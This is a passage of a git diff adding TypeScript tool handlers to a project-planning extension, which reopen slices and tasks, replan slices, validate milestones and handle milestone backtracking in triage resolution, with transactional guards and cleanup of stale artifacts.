+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  let guardError: string | null = null;
+  let tasksResetCount = 0;
+
+  transaction(() => {
+    const milestone = getMilestone(params.milestoneId);
+    if (!milestone) {
+      guardError = `milestone not found: ${params.milestoneId}`;
+      return;
+    }
+    if (isClosedStatus(milestone.status)) {
+      guardError = `cannot reopen slice in a closed milestone: ${params.milestoneId} (status: ${milestone.status})`;
+      return;
+    }
+
+    const slice = getSlice(params.milestoneId, params.sliceId);
+    if (!slice) {
+      guardError = `slice not found: ${params.milestoneId}/${params.sliceId}`;
+      return;
+    }
+    if (!isClosedStatus(slice.status)) {
+      guardError = `slice ${params.sliceId} is not complete (status: ${slice.status}) — nothing to reopen`;
+      return;
+    }
+
+    // Fetch tasks inside txn so the list is consistent with the slice status check
+    const tasks = getSliceTasks(params.milestoneId, params.sliceId);
+    tasksResetCount = tasks.length;
+
+    updateSliceStatus(params.milestoneId, params.sliceId, "in_progress");
+    for (const task of tasks) {
+      updateTaskStatus(params.milestoneId, params.sliceId, task.id, "pending");
+    }
+  });
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Invalidate caches ────────────────────────────────────────────────────
+  invalidateStateCache();
+
+  // ── Clean up stale filesystem artifacts (M12 fix) ────────────────────────
+  // Without this, the DB-filesystem reconciler sees SUMMARY.md files and
+  // auto-corrects tasks back to "complete", making reopen a no-op (#3161).
+  try {
+    const tasksDir = resolveTasksDir(basePath, params.milestoneId, params.sliceId);
+    if (tasksDir) {
+      const tasks = getSliceTasks(params.milestoneId, params.sliceId);
+      for (const task of tasks) {
+        const summaryPath = join(tasksDir, `${task.id}-SUMMARY.md`);
+        if (existsSync(summaryPath)) unlinkSync(summaryPath);
+      }
+    }
+    const sliceDir = resolveSlicePath(basePath, params.milestoneId, params.sliceId);
+    if (sliceDir) {
+      const sliceSummary = join(sliceDir, `${params.sliceId}-SUMMARY.md`);
+      if (existsSync(sliceSummary)) unlinkSync(sliceSummary);
+      const sliceUat = join(sliceDir, `${params.sliceId}-UAT.md`);
+      if (existsSync(sliceUat)) unlinkSync(sliceUat);
+    }
+  } catch (cleanupErr) {
+    logWarning("tool", `reopen-slice artifact cleanup warning: ${(cleanupErr as Error).message}`);
+  }
+  clearPathCache();
+
+  // ── Post-mutation hook ───────────────────────────────────────────────────
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+    writeManifest(basePath);
+    appendEvent(basePath, {
+      cmd: "reopen-slice",
+      params: {
+        milestoneId: params.milestoneId,
+        sliceId: params.sliceId,
+        reason: params.reason ?? null,
+        tasksReset: tasksResetCount,
+      },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (hookErr) {
+    logWarning("tool", `reopen-slice post-mutation hook warning: ${(hookErr as Error).message}`);
+  }
+
+  return {
+    milestoneId: params.milestoneId,
+    sliceId: params.sliceId,
+    tasksReset: tasksResetCount,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/reopen-task.ts b/src/resources/extensions/gsd/tools/reopen-task.ts
new file mode 100644
index 000000000..14dbf377e
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/reopen-task.ts
@@ -0,0 +1,146 @@
+/**
+ * reopen-task handler — the core operation behind gsd_task_reopen.
+ *
+ * Resets a completed task back to "pending" so it can be re-done
+ * without manual SQL surgery. The parent slice and milestone must
+ * still be open (not complete) — you cannot reopen tasks inside a
+ * closed slice.
+ */
+
+// GSD — reopen-task tool handler
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import {
+  getMilestone,
+  getSlice,
+  getTask,
+  updateTaskStatus,
+  transaction,
+} from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { isClosedStatus } from "../status-guards.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+import { existsSync, unlinkSync } from "node:fs";
+import { join } from "node:path";
+import { resolveTasksDir, clearPathCache } from "../paths.js";
+
+export interface ReopenTaskParams {
+  milestoneId: string;
+  sliceId: string;
+  taskId: string;
+  reason?: string;
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface ReopenTaskResult {
+  milestoneId: string;
+  sliceId: string;
+  taskId: string;
+}
+
+export async function handleReopenTask(
+  params: ReopenTaskParams,
+  basePath: string,
+): Promise<ReopenTaskResult | { error: string }> {
+  // ── Validate required fields ────────────────────────────────────────────
+  if (!params.taskId || typeof params.taskId !== "string" || params.taskId.trim() === "") {
+    return { error: "taskId is required and must be a non-empty string" };
+  }
+  if (!params.sliceId || typeof params.sliceId !== "string" || params.sliceId.trim() === "") {
+    return { error: "sliceId is required and must be a non-empty string" };
+  }
+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+
+  // ── Guards + DB write inside a single transaction (prevents TOCTOU) ────
+  let guardError: string | null = null;
+
+  transaction(() => {
+    const milestone = getMilestone(params.milestoneId);
+    if (!milestone) {
+      guardError = `milestone not found: ${params.milestoneId}`;
+      return;
+    }
+    if (isClosedStatus(milestone.status)) {
+      guardError = `cannot reopen task in a closed milestone: ${params.milestoneId} (status: ${milestone.status})`;
+      return;
+    }
+
+    const slice = getSlice(params.milestoneId, params.sliceId);
+    if (!slice) {
+      guardError = `slice not found: ${params.milestoneId}/${params.sliceId}`;
+      return;
+    }
+    if (isClosedStatus(slice.status)) {
+      guardError = `cannot reopen task in a closed slice: ${params.sliceId} (status: ${slice.status}) — use gsd_slice_reopen first`;
+      return;
+    }
+
+    const task = getTask(params.milestoneId, params.sliceId, params.taskId);
+    if (!task) {
+      guardError = `task not found: ${params.milestoneId}/${params.sliceId}/${params.taskId}`;
+      return;
+    }
+    if (!isClosedStatus(task.status)) {
+      guardError = `task ${params.taskId} is not complete (status: ${task.status}) — nothing to reopen`;
+      return;
+    }
+
+    updateTaskStatus(params.milestoneId, params.sliceId, params.taskId, "pending");
+  });
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Invalidate caches ────────────────────────────────────────────────────
+  invalidateStateCache();
+
+  // ── Clean up stale filesystem artifacts (M12 fix) ────────────────────────
+  // Without this, the DB-filesystem reconciler sees the SUMMARY.md and
+  // auto-corrects the task back to "complete", making reopen a no-op (#3161).
+  try {
+    const tasksDir = resolveTasksDir(basePath, params.milestoneId, params.sliceId);
+    if (tasksDir) {
+      const summaryPath = join(tasksDir, `${params.taskId}-SUMMARY.md`);
+      if (existsSync(summaryPath)) unlinkSync(summaryPath);
+    }
+  } catch (cleanupErr) {
+    logWarning("tool", `reopen-task artifact cleanup warning: ${(cleanupErr as Error).message}`);
+  }
+  clearPathCache();
+
+  // ── Post-mutation hook ───────────────────────────────────────────────────
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+    writeManifest(basePath);
+    appendEvent(basePath, {
+      cmd: "reopen-task",
+      params: {
+        milestoneId: params.milestoneId,
+        sliceId: params.sliceId,
+        taskId: params.taskId,
+        reason: params.reason ?? null,
+      },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (hookErr) {
+    logWarning("tool", `reopen-task post-mutation hook warning: ${(hookErr as Error).message}`);
+  }
+
+  return {
+    milestoneId: params.milestoneId,
+    sliceId: params.sliceId,
+    taskId: params.taskId,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/replan-slice.ts b/src/resources/extensions/gsd/tools/replan-slice.ts
new file mode 100644
index 000000000..9b323c79c
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/replan-slice.ts
@@ -0,0 +1,242 @@
+import { clearParseCache } from "../files.js";
+import {
+  transaction,
+  getSlice,
+  getSliceTasks,
+  getTask,
+  insertTask,
+  upsertTaskPlanning,
+  insertReplanHistory,
+  deleteTask,
+} from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { isClosedStatus } from "../status-guards.js";
+import { isNonEmptyString } from "../validation.js";
+import { renderPlanFromDb, renderReplanFromDb } from "../markdown-renderer.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+
+export interface ReplanSliceTaskInput {
+  taskId: string;
+  title: string;
+  description: string;
+  estimate: string;
+  files: string[];
+  verify: string;
+  inputs: string[];
+  expectedOutput: string[];
+  fullPlanMd?: string;
+}
+
+export interface ReplanSliceParams {
+  milestoneId: string;
+  sliceId: string;
+  blockerTaskId: string;
+  blockerDescription: string;
+  whatChanged: string;
+  updatedTasks: ReplanSliceTaskInput[];
+  removedTaskIds: string[];
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+}
+
+export interface ReplanSliceResult {
+  milestoneId: string;
+  sliceId: string;
+  replanPath: string;
+  planPath: string;
+}
+
+function validateParams(params: ReplanSliceParams): ReplanSliceParams {
+  if (!isNonEmptyString(params?.milestoneId)) throw new Error("milestoneId is required");
+  if (!isNonEmptyString(params?.sliceId)) throw new Error("sliceId is required");
+  if (!isNonEmptyString(params?.blockerTaskId)) throw new Error("blockerTaskId is required");
+  if (!isNonEmptyString(params?.blockerDescription)) throw new Error("blockerDescription is required");
+  if (!isNonEmptyString(params?.whatChanged)) throw new Error("whatChanged is required");
+
+  if (!Array.isArray(params.updatedTasks)) {
+    throw new Error("updatedTasks must be an array");
+  }
+
+  if (!Array.isArray(params.removedTaskIds)) {
+    throw new Error("removedTaskIds must be an array");
+  }
+
+  // Validate each updated task
+  for (let i = 0; i < params.updatedTasks.length; i++) {
+    const t = params.updatedTasks[i];
+    if (!t || typeof t !== "object") throw new Error(`updatedTasks[${i}] must be an object`);
+    if (!isNonEmptyString(t.taskId)) throw new Error(`updatedTasks[${i}].taskId is required`);
+    if (!isNonEmptyString(t.title)) throw new Error(`updatedTasks[${i}].title is required`);
+  }
+
+  return params;
+}
+
+export async function handleReplanSlice(
+  rawParams: ReplanSliceParams,
+  basePath: string,
+): Promise<ReplanSliceResult | { error: string }> {
+  // ── Validate ──────────────────────────────────────────────────────
+  let params: ReplanSliceParams;
+  try {
+    params = validateParams(rawParams);
+  } catch (err) {
+    return { error: `validation failed: ${(err as Error).message}` };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  // Guards must be inside the transaction so the state they check cannot
+  // change between the read and the write (#2723).
+  let guardError: string | null = null;
+  let existingTaskIds: Set<string> = new Set();
+
+  try {
+    transaction(() => {
+      // Verify parent slice exists and is not closed
+      const parentSlice = getSlice(params.milestoneId, params.sliceId);
+      if (!parentSlice) {
+        guardError = `missing parent slice: ${params.milestoneId}/${params.sliceId}`;
+        return;
+      }
+      if (isClosedStatus(parentSlice.status)) {
+        guardError = `cannot replan a closed slice: ${params.sliceId} (status: ${parentSlice.status})`;
+        return;
+      }
+
+      // Verify blocker task exists and is complete
+      const blockerTask = getTask(params.milestoneId, params.sliceId, params.blockerTaskId);
+      if (!blockerTask) {
+        guardError = `blockerTaskId not found: ${params.milestoneId}/${params.sliceId}/${params.blockerTaskId}`;
+        return;
+      }
+      if (!isClosedStatus(blockerTask.status)) {
+        guardError = `blockerTaskId ${params.blockerTaskId} is not complete (status: ${blockerTask.status}) — the blocker task must be finished before a replan is triggered`;
+        return;
+      }
+
+      // Structural enforcement — reject modifications/removal of completed tasks
+      const existingTasks = getSliceTasks(params.milestoneId, params.sliceId);
+      const completedTaskIds = new Set<string>();
+      for (const task of existingTasks) {
+        if (isClosedStatus(task.status)) {
+          completedTaskIds.add(task.id);
+        }
+      }
+
+      for (const updatedTask of params.updatedTasks) {
+        if (completedTaskIds.has(updatedTask.taskId)) {
+          guardError = `cannot modify completed task ${updatedTask.taskId}`;
+          return;
+        }
+      }
+
+      for (const removedId of params.removedTaskIds) {
+        if (completedTaskIds.has(removedId)) {
+          guardError = `cannot remove completed task ${removedId}`;
+          return;
+        }
+      }
+
+      existingTaskIds = new Set(existingTasks.map((t) => t.id));
+
+      // Record replan history
+      insertReplanHistory({
+        milestoneId: params.milestoneId,
+        sliceId: params.sliceId,
+        taskId: params.blockerTaskId,
+        summary: params.whatChanged,
+      });
+
+      // Apply task updates (upsert existing, insert new)
+      for (const updatedTask of params.updatedTasks) {
+        if (existingTaskIds.has(updatedTask.taskId)) {
+          // Update existing task's planning fields
+          upsertTaskPlanning(params.milestoneId, params.sliceId, updatedTask.taskId, {
+            title: updatedTask.title,
+            description: updatedTask.description || "",
+            estimate: updatedTask.estimate || "",
+            files: updatedTask.files || [],
+            verify: updatedTask.verify || "",
+            inputs: updatedTask.inputs || [],
+            expectedOutput: updatedTask.expectedOutput || [],
+            fullPlanMd: updatedTask.fullPlanMd,
+          });
+        } else {
+          // Insert new task then set planning fields
+          insertTask({
+            id: updatedTask.taskId,
+            sliceId: params.sliceId,
+            milestoneId: params.milestoneId,
+            title: updatedTask.title,
+            status: "pending",
+          });
+          upsertTaskPlanning(params.milestoneId, params.sliceId, updatedTask.taskId, {
+            title: updatedTask.title,
+            description: updatedTask.description || "",
+            estimate: updatedTask.estimate || "",
+            files: updatedTask.files || [],
+            verify: updatedTask.verify || "",
+            inputs: updatedTask.inputs || [],
+            expectedOutput: updatedTask.expectedOutput || [],
+            fullPlanMd: updatedTask.fullPlanMd,
+          });
+        }
+      }
+
+      // Delete removed tasks
+      for (const removedId of params.removedTaskIds) {
+        deleteTask(params.milestoneId, params.sliceId, removedId);
+      }
+    });
+  } catch (err) {
+    return { error: `db write failed: ${(err as Error).message}` };
+  }
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Render artifacts ──────────────────────────────────────────────
+  try {
+    const renderResult = await renderPlanFromDb(basePath, params.milestoneId, params.sliceId);
+    const replanResult = await renderReplanFromDb(basePath, params.milestoneId, params.sliceId, {
+      blockerTaskId: params.blockerTaskId,
+      blockerDescription: params.blockerDescription,
+      whatChanged: params.whatChanged,
+    });
+
+    // ── Invalidate caches ─────────────────────────────────────────
+    invalidateStateCache();
+    clearParseCache();
+
+    // ── Post-mutation hook: projections, manifest, event log ─────
+    try {
+      await renderAllProjections(basePath, params.milestoneId);
+      writeManifest(basePath);
+      appendEvent(basePath, {
+        cmd: "replan-slice",
+        params: { milestoneId: params.milestoneId, sliceId: params.sliceId, blockerTaskId: params.blockerTaskId },
+        ts: new Date().toISOString(),
+        actor: "agent",
+        actor_name: params.actorName,
+        trigger_reason: params.triggerReason,
+      });
+    } catch (hookErr) {
+      logWarning("tool", `replan-slice post-mutation hook warning: ${(hookErr as Error).message}`);
+    }
+
+    return {
+      milestoneId: params.milestoneId,
+      sliceId: params.sliceId,
+      replanPath: replanResult.replanPath,
+      planPath: renderResult.planPath,
+    };
+  } catch (err) {
+    return { error: `render failed: ${(err as Error).message}` };
+  }
+}
diff --git a/src/resources/extensions/gsd/tools/validate-milestone.ts b/src/resources/extensions/gsd/tools/validate-milestone.ts
new file mode 100644
index 000000000..b5e62acb9
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/validate-milestone.ts
@@ -0,0 +1,155 @@
+/**
+ * validate-milestone handler — the core operation behind gsd_validate_milestone.
+ *
+ * Persists milestone validation results to the assessments table and
+ * quality_gates table, renders VALIDATION.md to disk, and invalidates caches.
+ *
+ * #2945 Bug 4: Previously only wrote to assessments — quality_gates records
+ * were never persisted, causing M002+ milestones to have zero gate records
+ * despite passing validation.
+ */
+
+import { join } from "node:path";
+
+import {
+  transaction,
+  insertAssessment,
+  deleteAssessmentByScope,
+  getMilestoneSlices,
+} from "../gsd-db.js";
+import { resolveMilestonePath, clearPathCache } from "../paths.js";
+import { saveFile, clearParseCache } from "../files.js";
+import { invalidateStateCache } from "../state.js";
+import { VALIDATION_VERDICTS, isValidMilestoneVerdict } from "../verdict-parser.js";
+import { insertMilestoneValidationGates } from "../milestone-validation-gates.js";
+import { logWarning } from "../workflow-logger.js";
+
+export interface ValidateMilestoneParams {
+  milestoneId: string;
+  verdict: "pass" | "needs-attention" | "needs-remediation";
+  remediationRound: number;
+  successCriteriaChecklist: string;
+  sliceDeliveryAudit: string;
+  crossSliceIntegration: string;
+  requirementCoverage: string;
+  verificationClasses?: string;
+  verdictRationale: string;
+  remediationPlan?: string;
+}
+
+export interface ValidateMilestoneResult {
+  milestoneId: string;
+  verdict: string;
+  validationPath: string;
+}
+
+function renderValidationMarkdown(params: ValidateMilestoneParams): string {
+  let md = `---
+verdict: ${params.verdict}
+remediation_round: ${params.remediationRound}
+---
+
+# Milestone Validation: ${params.milestoneId}
+
+## Success Criteria Checklist
+${params.successCriteriaChecklist}
+
+## Slice Delivery Audit
+${params.sliceDeliveryAudit}
+
+## Cross-Slice Integration
+${params.crossSliceIntegration}
+
+## Requirement Coverage
+${params.requirementCoverage}
+
+${params.verificationClasses ? `## Verification Class Compliance
+${params.verificationClasses}
+
+` : ""}
+## Verdict Rationale
+${params.verdictRationale}
+`;
+
+  if (params.verdict === "needs-remediation" && params.remediationPlan) {
+    md += `\n## Remediation Plan\n${params.remediationPlan}\n`;
+  }
+
+  return md;
+}
+
+export async function handleValidateMilestone(
+  params: ValidateMilestoneParams,
+  basePath: string,
+): Promise<ValidateMilestoneResult | { error: string }> {
+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+  if (!isValidMilestoneVerdict(params.verdict)) {
+    return { error: `verdict must be one of: ${VALIDATION_VERDICTS.join(", ")}` };
+  }
+
+  // ── Resolve paths and render markdown ────────────────────────────────
+  const validationMd = renderValidationMarkdown(params);
+
+  let validationPath: string;
+  const milestoneDir = resolveMilestonePath(basePath, params.milestoneId);
+  if (milestoneDir) {
+    validationPath = join(milestoneDir, `${params.milestoneId}-VALIDATION.md`);
+  } else {
+    const gsdDir = join(basePath, ".gsd");
+    const manualDir = join(gsdDir, "milestones", params.milestoneId);
+    validationPath = join(manualDir, `${params.milestoneId}-VALIDATION.md`);
+  }
+
+  // ── DB write first — matches complete-task/complete-slice pattern ───
+  // Write DB before disk so a crash between the two leaves a recoverable
+  // state: the DB row exists but the file is missing, which projection
+  // rendering can regenerate. The inverse (file exists, no DB row) is
+  // harder to detect and recover from (#2725).
+  const validatedAt = new Date().toISOString();
+
+  transaction(() => {
+    insertAssessment({
+      path: validationPath,
+      milestoneId: params.milestoneId,
+      sliceId: null,
+      taskId: null,
+      status: params.verdict,
+      scope: 'milestone-validation',
+      fullContent: validationMd,
+    });
+
+    // #2945 Bug 4: persist quality_gates records alongside the assessment.
+    // Previously only the assessment was written, leaving M002+ milestones
+    // with zero quality_gate records despite passing validation.
+    const slices = getMilestoneSlices(params.milestoneId);
+    const sliceId = slices.length > 0 ? slices[0].id : "_milestone";
+    insertMilestoneValidationGates(
+      params.milestoneId,
+      sliceId,
+      params.verdict,
+      validatedAt,
+    );
+  });
+
+  // ── Filesystem render (outside transaction) ────────────────────────────
+  // If disk render fails, roll back the DB row so state stays consistent.
+  try {
+    await saveFile(validationPath, validationMd);
+  } catch (renderErr) {
+    logWarning("tool", `validate_milestone — disk render failed, rolling back DB row: ${(renderErr as Error).message}`);
+    deleteAssessmentByScope(params.milestoneId, 'milestone-validation');
+    return { error: `disk render failed: ${(renderErr as Error).message}` };
+  }
+
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+
+  return {
+    milestoneId: params.milestoneId,
+    verdict: params.verdict,
+    validationPath,
+  };
+}
diff --git a/src/resources/extensions/gsd/triage-resolution.ts b/src/resources/extensions/gsd/triage-resolution.ts
index 61e959077..4befa1ad6 100644
--- a/src/resources/extensions/gsd/triage-resolution.ts
+++ b/src/resources/extensions/gsd/triage-resolution.ts
@@ -10,8 +10,10 @@
  * Also provides detectFileOverlap() for surfacing downstream impact on quick tasks.
  */
 
-import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { existsSync, mkdirSync, readFileSync, unlinkSync } from "node:fs";
+import { atomicWriteSync } from "./atomic-write.js";
 import { join } from "node:path";
+import { createRequire } from "node:module";
 import { gsdRoot, milestonesDir } from "./paths.js";
 import { MILESTONE_ID_RE } from "./milestone-ids.js";
 import type { Classification, CaptureEntry } from "./captures.js";
@@ -21,6 +23,7 @@ import {
   loadActionableCaptures,
   markCaptureResolved,
   markCaptureExecuted,
+  stampCaptureMilestone,
 } from "./captures.js";
 
 // ─── Resolution Executors ─────────────────────────────────────────────────────
@@ -63,10 +66,10 @@ export function executeInject(
     const filesSection = content.indexOf("## Files Likely Touched");
     if (filesSection !== -1) {
       const updated = content.slice(0, filesSection) + newTask + "\n\n" + content.slice(filesSection);
-      writeFileSync(planPath, updated, "utf-8");
+      atomicWriteSync(planPath, updated, "utf-8");
     } else {
       // No Files section — append at end
-      writeFileSync(planPath, content.trimEnd() + "\n\n" + newTask + "\n", "utf-8");
+      atomicWriteSync(planPath, content.trimEnd() + "\n\n" + newTask + "\n", "utf-8");
     }
 
     return newId;
@@ -90,25 +93,173 @@ export function executeReplan(
     const triggerPath = join(
       basePath, ".gsd", "milestones", mid, "slices", sid, `${sid}-REPLAN-TRIGGER.md`,
     );
+    const ts = new Date().toISOString();
     const content = [
       `# Replan Trigger`,
       ``,
       `**Source:** Capture ${capture.id}`,
       `**Capture:** ${capture.text}`,
       `**Rationale:** ${capture.rationale ?? "User-initiated replan via capture triage"}`,
-      `**Triggered:** ${new Date().toISOString()}`,
+      `**Triggered:** ${ts}`,
       ``,
       `This file was created by the triage pipeline. The next dispatch cycle`,
       `will detect it and enter the replanning-slice phase.`,
     ].join("\n");
 
-    writeFileSync(triggerPath, content, "utf-8");
+    atomicWriteSync(triggerPath, content, "utf-8");
+
+    // Also write replan_triggered_at column for DB-backed detection
+    try {
+      const req = createRequire(import.meta.url);
+      const { isDbAvailable, _getAdapter } = req("./gsd-db.js");
+      if (isDbAvailable()) {
+        const adapter = _getAdapter();
+        if (adapter) {
+          adapter.prepare(
+            "UPDATE slices SET replan_triggered_at = :ts WHERE milestone_id = :mid AND id = :sid",
+          ).run({ ":ts": ts, ":mid": mid, ":sid": sid });
+        }
+      }
+    } catch {
+      // DB write is best-effort — disk file is the primary trigger for fallback path
+    }
+
     return true;
   } catch {
     return false;
   }
 }
 
+// ─── Backtrack (Milestone Regression) ────────────────────────────────────────
+
+/**
+ * Execute a backtrack directive — user wants to abandon current milestone
+ * and return to a previous one (milestone regression).
+ *
+ * Writes a BACKTRACK-TRIGGER.md marker at `.gsd/BACKTRACK-TRIGGER.md` with
+ * the target milestone, reason, and timestamp. The state machine (deriveState)
+ * detects this and transitions the project to the target milestone, resetting
+ * its slices to allow re-planning.
+ *
+ * Returns the extracted target milestone ID, or null if extraction failed.
+ */
+export function executeBacktrack(
+  basePath: string,
+  currentMilestoneId: string,
+  capture: CaptureEntry,
+): string | null {
+  try {
+    // Extract target milestone from capture text or resolution.
+    // Filter out the current milestone ID to avoid picking it as the backtrack target
+    // when the text mentions both current and target milestones (e.g. "backtrack from M004 to M003").
+    const sourceText = capture.resolution ?? capture.text;
+    const allMatches = [...sourceText.matchAll(/\b(M\d{3}(?:-[a-z0-9]{6})?)\b/g)]
+      .map(m => m[1])
+      .filter(id => id !== currentMilestoneId);
+    // Reject ambiguous multi-target strings — if more than one distinct target remains,
+    // don't guess; let the user clarify.
+    const uniqueTargets = [...new Set(allMatches)];
+    const targetMilestoneId = uniqueTargets.length === 1 ? uniqueTargets[0] : null;
+
+    const ts = new Date().toISOString();
+    const triggerPath = join(gsdRoot(basePath), "BACKTRACK-TRIGGER.md");
+    const content = [
+      `# Backtrack Trigger`,
+      ``,
+      `**Source:** Capture ${capture.id}`,
+      `**Capture:** ${capture.text}`,
+      `**Rationale:** ${capture.rationale ?? "User-initiated milestone backtrack"}`,
+      `**From:** ${currentMilestoneId}`,
+      `**Target:** ${targetMilestoneId ?? "(user to specify)"}`,
+      `**Triggered:** ${ts}`,
+      ``,
+      `Auto-mode was paused by this backtrack directive. The user directed`,
+      `that the current milestone (${currentMilestoneId}) be abandoned and work`,
+      `should return to ${targetMilestoneId ?? "a previous milestone"}.`,
+      ``,
+      `## Recovery Steps`,
+      ``,
+      `1. Review what went wrong in ${currentMilestoneId}`,
+      `2. Identify missing features/requirements from the target milestone`,
+      `3. Resume auto-mode — the state machine will re-enter discussion for the target`,
+    ].join("\n");
+
+    atomicWriteSync(triggerPath, content, "utf-8");
+
+    // If we have a valid target, also reset that milestone's completion status
+    // so deriveState() will re-enter it as the active milestone.
+    if (targetMilestoneId) {
+      try {
+        const targetDir = join(milestonesDir(basePath), targetMilestoneId);
+        if (existsSync(targetDir)) {
+          // Write a regression marker so the state machine knows this milestone
+          // needs re-discussion, not just re-execution
+          const regressionPath = join(targetDir, `${targetMilestoneId}-REGRESSION.md`);
+          atomicWriteSync(regressionPath, [
+            `# Milestone Regression`,
+            ``,
+            `**From:** ${currentMilestoneId}`,
+            `**Reason:** ${capture.text}`,
+            `**Triggered:** ${ts}`,
+            ``,
+            `This milestone is being revisited because downstream milestone`,
+            `${currentMilestoneId} failed or missed critical features that should`,
+            `have been part of this milestone's scope.`,
+            ``,
+            `The discuss phase should re-evaluate requirements and identify gaps.`,
+          ].join("\n"), "utf-8");
+        }
+      } catch { /* best-effort */ }
+    }
+
+    return targetMilestoneId;
+  } catch {
+    return null;
+  }
+}
+
+/**
+ * Read the backtrack trigger file if it exists.
+ * Returns the parsed target milestone and metadata, or null.
+ */
+export function readBacktrackTrigger(basePath: string): {
+  target: string | null;
+  from: string | null;
+  capture: string;
+  triggeredAt: string;
+} | null {
+  const triggerPath = join(gsdRoot(basePath), "BACKTRACK-TRIGGER.md");
+  if (!existsSync(triggerPath)) return null;
+
+  try {
+    const content = readFileSync(triggerPath, "utf-8");
+    const target = content.match(/\*\*Target:\*\*\s*(.+)/)?.[1]?.trim() ?? null;
+    const from = content.match(/\*\*From:\*\*\s*(.+)/)?.[1]?.trim() ?? null;
+    const capture = content.match(/\*\*Capture:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
+    const triggeredAt = content.match(/\*\*Triggered:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
+    return {
+      target: target === "(user to specify)" ? null : target,
+      from,
+      capture,
+      triggeredAt,
+    };
+  } catch {
+    return null;
+  }
+}
+
+/**
+ * Remove the backtrack trigger after it has been processed.
+ */
+export function clearBacktrackTrigger(basePath: string): void {
+  const triggerPath = join(gsdRoot(basePath), "BACKTRACK-TRIGGER.md");
+  try {
+    if (existsSync(triggerPath)) {
+      unlinkSync(triggerPath);
+    }
+  } catch { /* best-effort */ }
+}
+
 // ─── File Overlap Detection ───────────────────────────────────────────────────
 
 /**
@@ -211,7 +362,7 @@ export function ensureDeferMilestoneDir(
       ``,
     ].join("\n");
 
-    writeFileSync(
+    atomicWriteSync(
       join(msDir, `${targetMilestone}-CONTEXT-DRAFT.md`),
       draftContent,
       "utf-8",
@@ -252,11 +403,15 @@ export function buildQuickTaskPrompt(capture: CaptureEntry): string {
     ``,
     `## Instructions`,
     ``,
-    `1. Execute this task as a small, self-contained change.`,
-    `2. Do NOT modify any \`.gsd/\` plan files — this is a one-off, not a planned task.`,
-    `3. Commit your changes with a descriptive message.`,
-    `4. Keep changes minimal and focused on the capture text.`,
-    `5. When done, say: "Quick task complete."`,
+    `1. **Verify the issue still exists.** Before making any changes, inspect the`,
+    `   relevant code to confirm the problem described above is actually present in`,
+    `   the current codebase. If the issue has already been fixed (e.g., by planned`,
+    `   milestone work), report "Already resolved — no changes needed." and stop.`,
+    `2. Execute this task as a small, self-contained change.`,
+    `3. Do NOT modify any \`.gsd/\` plan files — this is a one-off, not a planned task.`,
+    `4. Commit your changes with a descriptive message.`,
+    `5. Keep changes minimal and focused on the capture text.`,
+    `6. When done, say: "Quick task complete."`,
   ].join("\n");
 }
 
@@ -274,6 +429,10 @@ export interface TriageExecutionResult {
   deferredMilestones: number;
   /** Captures classified as quick-task that need dispatch */
   quickTasks: CaptureEntry[];
+  /** Number of stop directives (will pause auto-mode via guard) */
+  stopped: number;
+  /** Backtrack captures (will trigger milestone regression via guard) */
+  backtracks: CaptureEntry[];
   /** Details of each action taken, for logging */
   actions: string[];
 }
@@ -302,20 +461,37 @@ export function executeTriageResolutions(
     replanned: 0,
     deferredMilestones: 0,
     quickTasks: [],
+    stopped: 0,
+    backtracks: [],
     actions: [],
   };
 
-  const actionable = loadActionableCaptures(basePath);
+  const actionable = loadActionableCaptures(basePath, mid || undefined);
 
-  // Also process deferred captures that target milestone IDs — create
-  // milestone directories so deriveState() discovers them.
-  const deferred = loadAllCaptures(basePath).filter(
-    c => c.status === "resolved" && !c.executed && c.classification === "defer",
+  // Reconciliation: stamp actionable captures that are missing the Milestone field
+  // with the current milestone ID.  This covers captures resolved by the triage LLM
+  // before the prompt included the Milestone instruction, and acts as a safety net
+  // when the LLM omits the field (#2872).
+  if (mid) {
+    for (const capture of actionable) {
+      if (!capture.resolvedInMilestone) {
+        stampCaptureMilestone(basePath, capture.id, mid);
+      }
+    }
+  }
+
+  // Also process deferred and milestone-class captures (#3542).
+  // A defer/milestone capture's "action" is the triage decision itself —
+  // once classified and resolved, the capture is done. The target milestone
+  // picks up the work naturally from its planning context.
+  const deferrable = loadAllCaptures(basePath).filter(
